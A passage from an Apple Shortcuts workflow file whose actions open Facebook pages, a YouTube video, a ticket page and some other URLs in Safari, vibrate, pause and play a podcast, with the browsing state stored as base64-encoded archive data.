				Rm9yUHJlZGljdGlvbl8QEGJ1bmRsZUlkZW50aWZpZXJe
				ZXhwaXJhdGlvbkRhdGVccGF5bG9hZEVycm9yVHV1aWRY
				a2V5d29yZHNcYWN0aXZpdHlUeXBlXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFXdmVyc2lvblhpc0FjdGl2ZV50
				ZWFtSWRlbnRpZmllclR0eXBlXxASZWxpZ2libGVGb3JI
				YW5kb2ZmXxAUZWxpZ2libGVGb3JSZW1pbmRlcnNbcmVm
				ZXJyZXJVUkxfEBd0YXJnZXRDb250ZW50SWRlbnRpZmll
				clYkY2xhc3NecGVlckRldmljZVR5cGVacGVlckRldmlj
				ZVR3aGVuXWNvbnRlbnRBY3Rpb25YcGF5bG9hZHNfEBFl
				bGlnaWJsZUZvclNlYXJjaIARgASABYAAgACAAggJgACA
				AIAAgACAAIAIgAsQAQiAABABCQiAAIAAgBOAAIAAgAmA
				AIANCNNKSyRMTU5XTlMua2V5c1pOUy5vYmplY3RzoKCA
				A9JQUVJTWiRjbGFzc25hbWVYJGNsYXNzZXNcTlNEaWN0
				aW9uYXJ5olJUWE5TT2JqZWN0XxArRGF2ZSBhbmQgSmlt
				bXkgUmFkaW8gU2hvdyAtIEhvbWUgfCBGYWNlYm9va9NX
				JFguWltXTlMuYmFzZVtOUy5yZWxhdGl2ZYAAgAeABl8Q
				Mmh0dHBzOi8vbS5mYWNlYm9vay5jb20vRGF2ZWFuZEpp
				bW15Lz9yZWY9Ym9va21hcmtz0lBRXl9VTlNVUkyiXlRf
				EB1OU1VzZXJBY3Rpdml0eVR5cGVCcm93c2luZ1dlYtJi
				JGNkV05TLnRpbWUjQcGUNt7QABmACtJQUWZnVk5TRGF0
				ZaJmVNJpJGprV05TLmRhdGFPEQLdYnBsaXN0MDDUAQID
				BAUGBwpYJHZlcnNpb25ZJGFyY2hpdmVyVCR0b3BYJG9i
				amVjdHMSAAGGoF8QD05TS2V5ZWRBcmNoaXZlctEICVRy
				b290gAGkCwwRElUkbnVsbNINDg8QWWNvbnRhaW5lclYk
				Y2xhc3OAAoADTxEBrN66AAEAAKwBAAAgAQAAHQAAAPAg
				AQAAAAAgAQAA/wAAAAMA9AAAACUAAABfX2NsYXNzOkNT
				U2VhcmNoYWJsZUl0ZW1BdHRyaWJ1dGVTZXQAvQAAAAYA
				dwAAAAkADwAAAHB1YmxpYy5jb250ZW50AFQAAAD//g4g
				ZgBhAGMAZQBiAG8AbwBrAC4AYwBvAG0ALwBEAGEAdgBl
				AGEAbgBkAEoAaQBtAG0AeQAvAD8AcgBlAGYAPQBiAG8A
				bwBrAG0AYQByAGsAcwAAAAAAAQACAAMABAAEAAQABgAG
				AGsAAAAAAAAA4AAAAAAAAAAA4FQAAAAAAAAA4BYAAABc
				AAAA9D8AAABvAAAA9SsAAAAAAAAA4CcAAAD0AAAAAOJQ
				AAAA8RMAa01ESXRlbVRodW1ibmFpbFVSTAASAGtNREl0
				ZW1Db250ZW50VHlwZQARAGtNREl0ZW1Db250ZW50VVJM
				ABIAa01ESXRlbURlc2NyaXB0aW9uABQAa01ESXRlbVRo
				dW1ibmFpbERhdGEAHgBrTURJdGVtUmVsYXRlZFVuaXF1
				ZUlkZW50aWZpZXIA0hMUFRZaJGNsYXNzbmFtZVgkY2xh
				c3Nlc18QHENTU2VhcmNoYWJsZUl0ZW1BdHRyaWJ1dGVT
				ZXSiFxhfEBxDU1NlYXJjaGFibGVJdGVtQXR0cmlidXRl
				U2V0WE5TT2JqZWN0AAgAEQAaACQAKQAyADcASQBMAFEA
				UwBYAF4AYwBtAHQAdgB4AigCLQI4AkECYAJjAoIAAAAA
				AAACAQAAAAAAAAAZAAAAAAAAAAAAAAAAAAACi4AM0lBR
				bW5dTlNNdXRhYmxlRGF0YaNvcFRdTlNNdXRhYmxlRGF0
				YVZOU0RhdGHTSkskcnR2oXOADqF1gA+AEF8QGlVBSW50
				ZW50c0lkZW50aWZpZXJQYXlsb2FkTxCwYnBsaXN0MDDU
				AQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hpdmVyVCR0b3BY
				JG9iamVjdHMSAAGGoF8QD05TS2V5ZWRBcmNoaXZlctEI
				CVRyb290gAGiCwxVJG51bGxfECQwNUIxQThENi0xRjdF
				LTQ5MEItQkI5Qy05OTgyQTNENzY5N0UIERokKTI3SUxR
				U1ZcAAAAAAAAAQEAAAAAAAAADQAAAAAAAAAAAAAAAAAA
				AIPSUFF6e18QE05TTXV0YWJsZURpY3Rpb25hcnmjelJU
				0kskfX6ggBLSUFGAgVVOU1NldKKAVNJQUYOEXxASVUFV
				c2VyQWN0aXZpdHlJbmZvooVUXxASVUFVc2VyQWN0aXZp
				dHlJbmZvAAgAEQAaACQAKQAyADcASQBMAFEAUwBqAHAA
				rwC8AMIAzQDjAPoBAgEeATYBSQFYAWUBagFzAYABmgGi
				AasBugG/AdQB6wH3AhECGAInAjICNwJFAk4CYgJkAmYC
				aAJqAmwCbgJvAnACcgJ0AnYCeAJ6AnwCfgKAAoECgwKF
				AoYChwKJAosCjQKPApECkwKVApcCmAKfAqcCsgKzArQC
				tgK7AsYCzwLcAt8C6AMWAx0DJQMxAzMDNQM3A2wDcQN3
				A3oDmgOfA6cDsAOyA7cDvgPBA8YDzgavBrEGtgbEBsgG
				1gbdBuQG5gboBuoG7AbuBwsHvgfDB9kH3QfiB+MH5Qfq
				B/AH8wf4CA0IEAAAAAAAAAIBAAAAAAAAAIYAAAAAAAAA
				AAAAAAAAAAgl
				</data>
				<key>UserActivitySubtitle</key>
				<string>‎facebook.com/DaveandJimmy/?ref=bookmarks</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.url</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>0AA74210-5104-4487-BDD1-84A7F03B5FFA</string>
				<key>WFURLActionURL</key>
				<string>https://iosvpncode.com/action/04/?spthru=1&amp;psh=3&amp;cep=gxAziBuy7H6mGwuq_J9FShQ5fRIGIYdficeNu-k4CLieaon3Nn518jQL10ogA5Sep1JM8OE1ykkAdPu5zJ_V9YsBumJrE5ctHqUnPYD7jHEIJzyZBUB1KqRAg0EygRzqddmguayjT6AEW-4oWkpnbiwxdJdZS3wP-Sj4hc5UKD0X5vfSQ3foNtoltKH8HDh8n8KPFLRWh9IhEl1mu_envG8qTSQQqpDEsHkwp2JudxOfkX3ZWGzhMLU8hpUiFWyUGpJHFuCJK-fPy7SjKljWVrEURvelXEbg1eL0qh2813kv4rwMYSUSuOHhGvNM-LfgQtX0ySMbmCZDPrNpGR4OG97j9-I4fzAUl_iolAWjWLp4ZaLvN3vxrCgAD-fJkRs8</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.openurl</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFInput</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>OutputName</key>
						<string>URL</string>
						<key>OutputUUID</key>
						<string>0AA74210-5104-4487-BDD1-84A7F03B5FFA</string>
						<key>Type</key>
						<string>ActionOutput</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenAttachment</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.vibrate</string>
			<key>WFWorkflowActionParameters</key>
			<dict/>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGYmNYJHZlcnNpb25YJG9iamVj
				dHNZJGFyY2hpdmVyVCR0b3ASAAGGoK4HCDc9Q0RKS05P
				U1hbXlUkbnVsbN8QFwkKCwwNDg8QERITFBUWFxgZGhsc
				HR4fICEiIyMlJicjKSMjIy0nLzAjMiYjIyZccmVxdWly
				ZWRLZXlzVXRpdGxlWndlYnBhZ2VVUkxfEBNkeW5hbWlj
				QWN0aXZpdHlUeXBlXxAUcGVyc2lzdGVudElkZW50aWZp
				ZXJXb3B0aW9uc18QGWVsaWdpYmxlRm9yUHVibGljSW5k
				ZXhpbmdfEBVlbGlnaWJsZUZvclByZWRpY3Rpb25eZXhw
				aXJhdGlvbkRhdGVWJGNsYXNzXHBheWxvYWRFcnJvclR1
				dWlkWGtleXdvcmRzXGFjdGl2aXR5VHlwZV8QEmVsaWdp
				YmxlRm9ySGFuZG9mZld2ZXJzaW9uXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFedGVhbUlkZW50aWZpZXJUdHlw
				ZV8QFGVsaWdpYmxlRm9yUmVtaW5kZXJzW3JlZmVycmVy
				VVJMXWNvbnRlbnRBY3Rpb25fEBFlbGlnaWJsZUZvclNl
				YXJjaIALgASABYAAgACAAggJgACADYAAgACAAIAICRAB
				gAmAABABCIAAgAAI0zg5Ejo7PFdOUy5rZXlzWk5TLm9i
				amVjdHOgoIAD0j4/QEFaJGNsYXNzbmFtZVgkY2xhc3Nl
				c1xOU0RpY3Rpb25hcnmiQEJYTlNPYmplY3RfECREZW9u
				IEVudGVydGFpbm1lbnQgLSBIb21lIHwgRmFjZWJvb2vT
				RRJGI0hJV05TLmJhc2VbTlMucmVsYXRpdmWAAIAHgAZf
				ED1odHRwczovL20uZmFjZWJvb2suY29tL0Rlb25FbnRl
				cnRhaW5tZW50Lz9yZWZpZD01MiZfX3RuX189Qy1S0j4/
				TE1VTlNVUkyiTEJfEB1OU1VzZXJBY3Rpdml0eVR5cGVC
				cm93c2luZ1dlYtJQElFSV05TLmRhdGFPEQLkYnBsaXN0
				MDDUAQIDBAUGFRZYJHZlcnNpb25YJG9iamVjdHNZJGFy
				Y2hpdmVyVCR0b3ASAAGGoKQHCA0OVSRudWxs0gkKCwxZ
				Y29udGFpbmVyViRjbGFzc4ACgANPEQGz3roAAQAAswEA
				AD4BAAAdAAAA8D4BAAAAAD4BAAAdAQAABAANAQAAJQAA
				AF9fY2xhc3M6Q1NTZWFyY2hhYmxlSXRlbUF0dHJpYnV0
				ZVNldADGAAAABQCNAAAABwAPAAAAcHVibGljLmNvbnRl
				bnQAagAAAP/+DiBmAGEAYwBlAGIAbwBvAGsALgBjAG8A
				bQAvAEQAZQBvAG4ARQBuAHQAZQByAHQAYQBpAG4AbQBl
				AG4AdAAvAD8AcgBlAGYAaQBkAD0ANQAyACYAXwBfAHQA
				bgBfAF8APQBDAC0AUgAAAAAAAQADAAMAAwADAAUAFgAA
				AFwAAAD0VAAAAAAAAADgPwAAAG8AAAD1KwAAAAAAAADg
				AAAAAAAAAADgDAAAAAAADAAAAAEAAAAAACcAAAD0AAAA
				AOJQAAAA8RoBAADxEwBrTURJdGVtVGh1bWJuYWlsVVJM
				ABIAa01ESXRlbUNvbnRlbnRUeXBlABEAa01ESXRlbUNv
				bnRlbnRVUkwAEgBrTURJdGVtRGVzY3JpcHRpb24AHgBr
				TURJdGVtUmVsYXRlZFVuaXF1ZUlkZW50aWZpZXIA0g8Q
				ERJaJGNsYXNzbmFtZVgkY2xhc3Nlc18QHENTU2VhcmNo
				YWJsZUl0ZW1BdHRyaWJ1dGVTZXSiExRfEBxDU1NlYXJj
				aGFibGVJdGVtQXR0cmlidXRlU2V0WE5TT2JqZWN0XxAP
				TlNLZXllZEFyY2hpdmVy0RcYVHJvb3SAAQAIABEAGgAj
				AC0AMgA3ADwAQgBHAFEAWABaAFwCEwIYAiMCLAJLAk4C
				bQJ2AogCiwKQAAAAAAAAAgEAAAAAAAAAGQAAAAAAAAAA
				AAAAAAAAApKACtI+P1RVXU5TTXV0YWJsZURhdGGjVldC
				XU5TTXV0YWJsZURhdGFWTlNEYXRh0jkSWVqggAzSPj9c
				XVVOU1NldKJcQtI+P19gXxASVUFVc2VyQWN0aXZpdHlJ
				bmZvomFCXxASVUFVc2VyQWN0aXZpdHlJbmZvXxAPTlNL
				ZXllZEFyY2hpdmVy0WRlVHJvb3SAAQAIABEAGgAjAC0A
				MgA3AEYATAB9AIoAkACbALEAyADQAOwBBAETARoBJwEs
				ATUBQgFXAV8BeQGIAY0BpAGwAb4B0gHUAdYB2AHaAdwB
				3gHfAeAB4gHkAeYB6AHqAewB7QHvAfEB8wH1AfYB+AH6
				AfsCAgIKAhUCFgIXAhkCHgIpAjICPwJCAksCcgJ5AoEC
				jQKPApECkwLTAtgC3gLhAwEDBgMOBfYF+AX9BgsGDwYd
				BiQGKQYqBiwGMQY3BjoGPwZUBlcGbAZ+BoEGhgAAAAAA
				AAIBAAAAAAAAAGYAAAAAAAAAAAAAAAAAAAaI
				</data>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.url</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>3C88AF24-3706-425B-AD9D-D96B18620163</string>
				<key>WFURLActionURL</key>
				<string>http://ww1.mp32u.net/</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.geturlcomponent</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>UUID</key>
				<string>C6DACAE8-8440-4DEA-A9E9-279E3933F81B</string>
				<key>WFURL</key>
				<dict>
					<key>Value</key>
					<dict>
						<key>attachmentsByRange</key>
						<dict>
							<key>{0, 1}</key>
							<dict>
								<key>OutputName</key>
								<string>URL</string>
								<key>OutputUUID</key>
								<string>3C88AF24-3706-425B-AD9D-D96B18620163</string>
								<key>Type</key>
								<string>ActionOutput</string>
							</dict>
						</dict>
						<key>string</key>
						<string>￼</string>
					</dict>
					<key>WFSerializationType</key>
					<string>WFTextTokenString</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGYmNYJHZlcnNpb25YJG9iamVj
				dHNZJGFyY2hpdmVyVCR0b3ASAAGGoK4HCDc9Q0RKS05P
				U1hbXlUkbnVsbN8QFwkKCwwNDg8QERITFBUWFxgZGhsc
				HR4fICEiIyMlJicjKSMjIy0nLzAjMiYjIyZccmVxdWly
				ZWRLZXlzVXRpdGxlWndlYnBhZ2VVUkxfEBNkeW5hbWlj
				QWN0aXZpdHlUeXBlXxAUcGVyc2lzdGVudElkZW50aWZp
				ZXJXb3B0aW9uc18QGWVsaWdpYmxlRm9yUHVibGljSW5k
				ZXhpbmdfEBVlbGlnaWJsZUZvclByZWRpY3Rpb25eZXhw
				aXJhdGlvbkRhdGVWJGNsYXNzXHBheWxvYWRFcnJvclR1
				dWlkWGtleXdvcmRzXGFjdGl2aXR5VHlwZV8QEmVsaWdp
				YmxlRm9ySGFuZG9mZld2ZXJzaW9uXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFedGVhbUlkZW50aWZpZXJUdHlw
				ZV8QFGVsaWdpYmxlRm9yUmVtaW5kZXJzW3JlZmVycmVy
				VVJMXWNvbnRlbnRBY3Rpb25fEBFlbGlnaWJsZUZvclNl
				YXJjaIALgASABYAAgACAAggJgACADYAAgACAAIAICRAB
				gAmAABABCIAAgAAI0zg5Ejo7PFdOUy5rZXlzWk5TLm9i
				amVjdHOgoIAD0j4/QEFaJGNsYXNzbmFtZVgkY2xhc3Nl
				c1xOU0RpY3Rpb25hcnmiQEJYTlNPYmplY3RfEFRXaGF0
				IGlzIHdyb25nIHdpdGggWW91VHViZSBhbmQgR29vZ2xl
				IHRoZXNlIGRheXM/fCBCcnljZSB0YWxrIHNob3cgKHMy
				LUVQMyAtIFlvdVR1YmXTRRJGI0hJV05TLmJhc2VbTlMu
				cmVsYXRpdmWAAIAHgAZfEDpodHRwczovL20ueW91dHVi
				ZS5jb20vd2F0Y2g/ZmVhdHVyZT15b3V0dS5iZSZ2PTU2
				MWJUdFlEcUdB0j4/TE1VTlNVUkyiTEJfEB1OU1VzZXJB
				Y3Rpdml0eVR5cGVCcm93c2luZ1dlYtJQElFSV05TLmRh
				dGFPEQLeYnBsaXN0MDDUAQIDBAUGFRZYJHZlcnNpb25Y
				JG9iamVjdHNZJGFyY2hpdmVyVCR0b3ASAAGGoKQHCA0O
				VSRudWxs0gkKCwxZY29udGFpbmVyViRjbGFzc4ACgANP
				EQGt3roAAQAArQEAADgBAAAdAAAA8DgBAAAAADgBAAAX
				AQAABAAHAQAAJQAAAF9fY2xhc3M6Q1NTZWFyY2hhYmxl
				SXRlbUF0dHJpYnV0ZVNldADAAAAABQCHAAAABwAPAAAA
				cHVibGljLmNvbnRlbnQAZAAAAP/+DiB5AG8AdQB0AHUA
				YgBlAC4AYwBvAG0ALwB3AGEAdABjAGgAPwBmAGUAYQB0
				AHUAcgBlAD0AeQBvAHUAdAB1AC4AYgBlACYAdgA9ADUA
				NgAxAGIAVAB0AFkARABxAEcAQQAAAAAAAQADAAMAAwAD
				AAUAFgAAAFwAAAD0VAAAAAAAAADgPwAAAG8AAAD1KwAA
				AAAAAADgAAAAAAAAAADgDAAAAAAADAAAAAEAAAAAACcA
				AAD0AAAAAOJQAAAA8RQBAADxEwBrTURJdGVtVGh1bWJu
				YWlsVVJMABIAa01ESXRlbUNvbnRlbnRUeXBlABEAa01E
				SXRlbUNvbnRlbnRVUkwAEgBrTURJdGVtRGVzY3JpcHRp
				b24AHgBrTURJdGVtUmVsYXRlZFVuaXF1ZUlkZW50aWZp
				ZXIA0g8QERJaJGNsYXNzbmFtZVgkY2xhc3Nlc18QHENT
				U2VhcmNoYWJsZUl0ZW1BdHRyaWJ1dGVTZXSiExRfEBxD
				U1NlYXJjaGFibGVJdGVtQXR0cmlidXRlU2V0WE5TT2Jq
				ZWN0XxAPTlNLZXllZEFyY2hpdmVy0RcYVHJvb3SAAQAI
				ABEAGgAjAC0AMgA3ADwAQgBHAFEAWABaAFwCDQISAh0C
				JgJFAkgCZwJwAoIChQKKAAAAAAAAAgEAAAAAAAAAGQAA
				AAAAAAAAAAAAAAAAAoyACtI+P1RVXU5TTXV0YWJsZURh
				dGGjVldCXU5TTXV0YWJsZURhdGFWTlNEYXRh0jkSWVqg
				gAzSPj9cXVVOU1NldKJcQtI+P19gXxASVUFVc2VyQWN0
				aXZpdHlJbmZvomFCXxASVUFVc2VyQWN0aXZpdHlJbmZv
				XxAPTlNLZXllZEFyY2hpdmVy0WRlVHJvb3SAAQAIABEA
				GgAjAC0AMgA3AEYATAB9AIoAkACbALEAyADQAOwBBAET
				ARoBJwEsATUBQgFXAV8BeQGIAY0BpAGwAb4B0gHUAdYB
				2AHaAdwB3gHfAeAB4gHkAeYB6AHqAewB7QHvAfEB8wH1
				AfYB+AH6AfsCAgIKAhUCFgIXAhkCHgIpAjICPwJCAksC
				ogKpArECvQK/AsECwwMAAwUDCwMOAy4DMwM7Bh0GHwYk
				BjIGNgZEBksGUAZRBlMGWAZeBmEGZgZ7Bn4GkwalBqgG
				rQAAAAAAAAIBAAAAAAAAAGYAAAAAAAAAAAAAAAAAAAav
				</data>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.delay</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFDelayTime</key>
				<real>14</real>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hp
				dmVyVCR0b3BYJG9iamVjdHMSAAGGoF8QD05TS2V5ZWRB
				cmNoaXZlctEICVRyb290gAGvEBQLDElPVVZcXWBhZWhs
				cXd4eXx/glUkbnVsbN8QHg0ODxAREhMUFRYXGBkaGxwd
				Hh8gISIjJCUmJygpKissLS4uMDEyLi4uLi44OToxLj0y
				MS4uQi4uRS5HMVxyZXF1aXJlZEtleXNVdGl0bGVad2Vi
				cGFnZVVSTF8QE2R5bmFtaWNBY3Rpdml0eVR5cGVfEBRw
				ZXJzaXN0ZW50SWRlbnRpZmllcldvcHRpb25zXxAZZWxp
				Z2libGVGb3JQdWJsaWNJbmRleGluZ18QFWVsaWdpYmxl
				Rm9yUHJlZGljdGlvbl8QEGJ1bmRsZUlkZW50aWZpZXJe
				ZXhwaXJhdGlvbkRhdGVccGF5bG9hZEVycm9yVHV1aWRY
				a2V5d29yZHNcYWN0aXZpdHlUeXBlXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFXdmVyc2lvblhpc0FjdGl2ZV50
				ZWFtSWRlbnRpZmllclR0eXBlXxASZWxpZ2libGVGb3JI
				YW5kb2ZmXxAUZWxpZ2libGVGb3JSZW1pbmRlcnNbcmVm
				ZXJyZXJVUkxfEBd0YXJnZXRDb250ZW50SWRlbnRpZmll
				clYkY2xhc3NecGVlckRldmljZVR5cGVacGVlckRldmlj
				ZVR3aGVuXWNvbnRlbnRBY3Rpb25YcGF5bG9hZHNfEBFl
				bGlnaWJsZUZvclNlYXJjaIARgASABYAAgACAAggJgACA
				AIAAgACAAIAIgAsQAQiAABABCQiAAIAAgBOAAIAAgAmA
				AIANCNNKSyRMTU5XTlMua2V5c1pOUy5vYmplY3RzoKCA
				A9JQUVJTWiRjbGFzc25hbWVYJGNsYXNzZXNcTlNEaWN0
				aW9uYXJ5olJUWE5TT2JqZWN0XxAlQW5keSBFbnRlcnRh
				aW5tZW50IC0gUG9zdHMgfCBGYWNlYm9va9NXJFguWltX
				TlMuYmFzZVtOUy5yZWxhdGl2ZYAAgAeABl8QSGh0dHBz
				Oi8vbS5mYWNlYm9vay5jb20vcGFnZXMvY2F0ZWdvcnkv
				Q29tZWRpYW4vQW5keU1FbnRlcnRhaW5tZW50L3Bvc3Rz
				L9JQUV5fVU5TVVJMol5UXxAdTlNVc2VyQWN0aXZpdHlU
				eXBlQnJvd3NpbmdXZWLSYiRjZFdOUy50aW1lI0HBY3J/
				/rGJgArSUFFmZ1ZOU0RhdGWiZlTSaSRqa1dOUy5kYXRh
				TxEC5WJwbGlzdDAw1AECAwQFBgcKWCR2ZXJzaW9uWSRh
				cmNoaXZlclQkdG9wWCRvYmplY3RzEgABhqBfEA9OU0tl
				eWVkQXJjaGl2ZXLRCAlUcm9vdIABpAsMERJVJG51bGzS
				DQ4PEFljb250YWluZXJWJGNsYXNzgAKAA08RAbTeugAB
				AAC0AQAAPwEAAB0AAADwPwEAAAAAPwEAAB4BAAADABMB
				AAAlAAAAX19jbGFzczpDU1NlYXJjaGFibGVJdGVtQXR0
				cmlidXRlU2V0ANwAAAAFAKMAAAAHAA8AAABwdWJsaWMu
				Y29udGVudACAAAAA//4OIGYAYQBjAGUAYgBvAG8AawAu
				AGMAbwBtAC8AcABhAGcAZQBzAC8AYwBhAHQAZQBnAG8A
				cgB5AC8AQwBvAG0AZQBkAGkAYQBuAC8AQQBuAGQAeQBN
				AEUAbgB0AGUAcgB0AGEAaQBuAG0AZQBuAHQALwBwAG8A
				cwB0AHMALwAAAAAAAQADAAMAAwADAAUAFgAAAFwAAAD0
				VAAAAAAAAADgPwAAAG8AAAD1KwAAAAAAAADgAAAAAAAA
				AADgJwAAAPQAAAAA4lAAAADxEwBrTURJdGVtVGh1bWJu
				YWlsVVJMABIAa01ESXRlbUNvbnRlbnRUeXBlABEAa01E
				SXRlbUNvbnRlbnRVUkwAEgBrTURJdGVtRGVzY3JpcHRp
				b24AHgBrTURJdGVtUmVsYXRlZFVuaXF1ZUlkZW50aWZp
				ZXIA0hMUFRZaJGNsYXNzbmFtZVgkY2xhc3Nlc18QHENT
				U2VhcmNoYWJsZUl0ZW1BdHRyaWJ1dGVTZXSiFxhfEBxD
				U1NlYXJjaGFibGVJdGVtQXR0cmlidXRlU2V0WE5TT2Jq
				ZWN0AAgAEQAaACQAKQAyADcASQBMAFEAUwBYAF4AYwBt
				AHQAdgB4AjACNQJAAkkCaAJrAooAAAAAAAACAQAAAAAA
				AAAZAAAAAAAAAAAAAAAAAAACk4AM0lBRbW5dTlNNdXRh
				YmxlRGF0YaNvcFRdTlNNdXRhYmxlRGF0YVZOU0RhdGHT
				SkskcnR2oXOADqF1gA+AEF8QGlVBSW50ZW50c0lkZW50
				aWZpZXJQYXlsb2FkTxCwYnBsaXN0MDDUAQIDBAUGBwpY
				JHZlcnNpb25ZJGFyY2hpdmVyVCR0b3BYJG9iamVjdHMS
				AAGGoF8QD05TS2V5ZWRBcmNoaXZlctEICVRyb290gAGi
				CwxVJG51bGxfECQ3NzY1RkRFRS0wMjlFLTREQkItODIz
				RC0zRjZCRjJGNDU4MUIIERokKTI3SUxRU1ZcAAAAAAAA
				AQEAAAAAAAAADQAAAAAAAAAAAAAAAAAAAIPSUFF6e18Q
				E05TTXV0YWJsZURpY3Rpb25hcnmjelJU0kskfX6ggBLS
				UFGAgVVOU1NldKKAVNJQUYOEXxASVUFVc2VyQWN0aXZp
				dHlJbmZvooVUXxASVUFVc2VyQWN0aXZpdHlJbmZvAAgA
				EQAaACQAKQAyADcASQBMAFEAUwBqAHAArwC8AMIAzQDj
				APoBAgEeATYBSQFYAWUBagFzAYABmgGiAasBugG/AdQB
				6wH3AhECGAInAjICNwJFAk4CYgJkAmYCaAJqAmwCbgJv
				AnACcgJ0AnYCeAJ6AnwCfgKAAoECgwKFAoYChwKJAosC
				jQKPApECkwKVApcCmAKfAqcCsgKzArQCtgK7AsYCzwLc
				At8C6AMQAxcDHwMrAy0DLwMxA3wDgQOHA4oDqgOvA7cD
				wAPCA8cDzgPRA9YD3gbHBskGzgbcBuAG7gb1BvwG/gcA
				BwIHBAcGByMH1gfbB/EH9Qf6B/sH/QgCCAgICwgQCCUI
				KAAAAAAAAAIBAAAAAAAAAIYAAAAAAAAAAAAAAAAAAAg9
				</data>
				<key>UserActivitySubtitle</key>
				<string>‎facebook.com/pages/category/Comedian/AndyMEntertainment/posts/</string>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.vibrate</string>
			<key>WFWorkflowActionParameters</key>
			<dict/>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.playpodcast</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>WFPodcastShow</key>
				<dict>
					<key>collectionId</key>
					<string>1338541325</string>
					<key>collectionName</key>
					<string>Covino &amp; Rich Show Podcast</string>
					<key>kind</key>
					<string>podcast</string>
				</dict>
			</dict>
		</dict>
		<dict>
			<key>WFWorkflowActionIdentifier</key>
			<string>is.workflow.actions.useractivity.open</string>
			<key>WFWorkflowActionParameters</key>
			<dict>
				<key>AppBundleIdentifier</key>
				<string>com.apple.mobilesafari</string>
				<key>UserActivityData</key>
				<data>
				YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hp
				dmVyVCR0b3BYJG9iamVjdHMSAAGGoF8QD05TS2V5ZWRB
				cmNoaXZlctEICVRyb290gAGvEBQLDElPVVZcXWBhZWhs
				cXd4eXx/glUkbnVsbN8QHg0ODxAREhMUFRYXGBkaGxwd
				Hh8gISIjJCUmJygpKissLS4uMDEyLi4uLi44OToxLj0y
				MS4uQi4uRS5HMVxyZXF1aXJlZEtleXNVdGl0bGVad2Vi
				cGFnZVVSTF8QE2R5bmFtaWNBY3Rpdml0eVR5cGVfEBRw
				ZXJzaXN0ZW50SWRlbnRpZmllcldvcHRpb25zXxAZZWxp
				Z2libGVGb3JQdWJsaWNJbmRleGluZ18QFWVsaWdpYmxl
				Rm9yUHJlZGljdGlvbl8QEGJ1bmRsZUlkZW50aWZpZXJe
				ZXhwaXJhdGlvbkRhdGVccGF5bG9hZEVycm9yVHV1aWRY
				a2V5d29yZHNcYWN0aXZpdHlUeXBlXxAXY29udGVudEF0
				dHJpYnV0ZVNldERhdGFXdmVyc2lvblhpc0FjdGl2ZV50
				ZWFtSWRlbnRpZmllclR0eXBlXxASZWxpZ2libGVGb3JI
				YW5kb2ZmXxAUZWxpZ2libGVGb3JSZW1pbmRlcnNbcmVm
				ZXJyZXJVUkxfEBd0YXJnZXRDb250ZW50SWRlbnRpZmll
				clYkY2xhc3NecGVlckRldmljZVR5cGVacGVlckRldmlj
				ZVR3aGVuXWNvbnRlbnRBY3Rpb25YcGF5bG9hZHNfEBFl
				bGlnaWJsZUZvclNlYXJjaIARgASABYAAgACAAggJgACA
				AIAAgACAAIAIgAsQAQiAABABCQiAAIAAgBOAAIAAgAmA
				AIANCNNKSyRMTU5XTlMua2V5c1pOUy5vYmplY3RzoKCA
				A9JQUVJTWiRjbGFzc25hbWVYJGNsYXNzZXNcTlNEaWN0
				aW9uYXJ5olJUWE5TT2JqZWN0XxA4QmFuZHNpbnRvd24g
				fCBEaXBsbyBUaWNrZXRzIC0gWFMgTGFzIFZlZ2FzLCBK
				dWwgMDYsIDIwMTnTVyRYLlpbV05TLmJhc2VbTlMucmVs
				YXRpdmWAAIAHgAZfEJVodHRwczovL3d3dy5iYW5kc2lu
				dG93bi5jb20vZS8xMDExMzQwMTk/YWZmaWxfY29kZT1q
				c19kaXBsby5jb20mYXBwX2lkPWpzX2RpcGxvLmNvbSZj
				YW1lX2Zyb209MjQyJnV0bV9jYW1wYWlnbj1ldmVudCZ1
